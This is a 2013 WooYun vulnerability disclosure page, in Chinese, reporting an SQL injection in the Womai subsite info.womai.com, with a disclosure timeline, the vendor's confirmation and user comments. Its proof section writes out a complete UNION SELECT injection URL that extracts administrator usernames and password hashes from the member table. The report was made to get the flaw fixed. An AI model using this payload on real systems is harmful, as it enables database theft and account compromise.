当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017706

漏洞标题:中粮我买网SQL注入

相关厂商:中粮我买网

漏洞作者: txcbg

提交时间:2013-01-23 09:18

修复时间:2013-03-09 09:19

公开时间:2013-03-09 09:19

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-23: 细节已通知厂商并且等待厂商处理中
2013-01-23: 厂商已经确认,细节仅向厂商公开
2013-02-02: 细节向核心白帽子及相关领域专家公开
2013-02-12: 细节向普通白帽子公开
2013-02-22: 细节向实习白帽子公开
2013-03-09: 细节向公众公开

简要描述:

中粮我买网SQL注入,可能造成大量用户信息泄露。

详细说明:

中粮我买网食全食美分站info.womai.com存在SQL注入漏洞,通过注入可以获得所有管理员用户和普通用户的用户名和密码等敏感信息,可以被拖库。目测至少有数万用户数据,危害巨大。

漏洞证明:

用浏览器打开下面的地址:
http://info.womai.com//plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__member`%23@`\'`+]=a
就可以获得所有管理员用户的用户名和加密的密码,如图1。某些管理员的密码在cmd5网站可以破解出明文密码。通过注入看了下会员的数量,有12638个会员,如图2。

1.jpg


2.jpg

修复方案:

管理员懂的。

版权声明:转载请注明来源 txcbg@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-01-23 09:32

厂商回复:

这个太无语了,我们立即找人修复。。感谢洞主~

最新状态:

暂无


漏洞评价:

评论

  1. 2013-01-23 12:41 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    厂商的回复亮了。

  2. 2013-01-23 21:57 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    厂商回复两个亮点:1、太无语了;2、找人修复

  3. 2013-01-29 14:08 | 中粮我买网(乌云厂商)

    @一刀终情 找人也是自己人。。同学,不要想多了。哈哈哈。

  4. 2013-03-09 09:35 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @中粮我买网 回复果然够亮。哈哈哈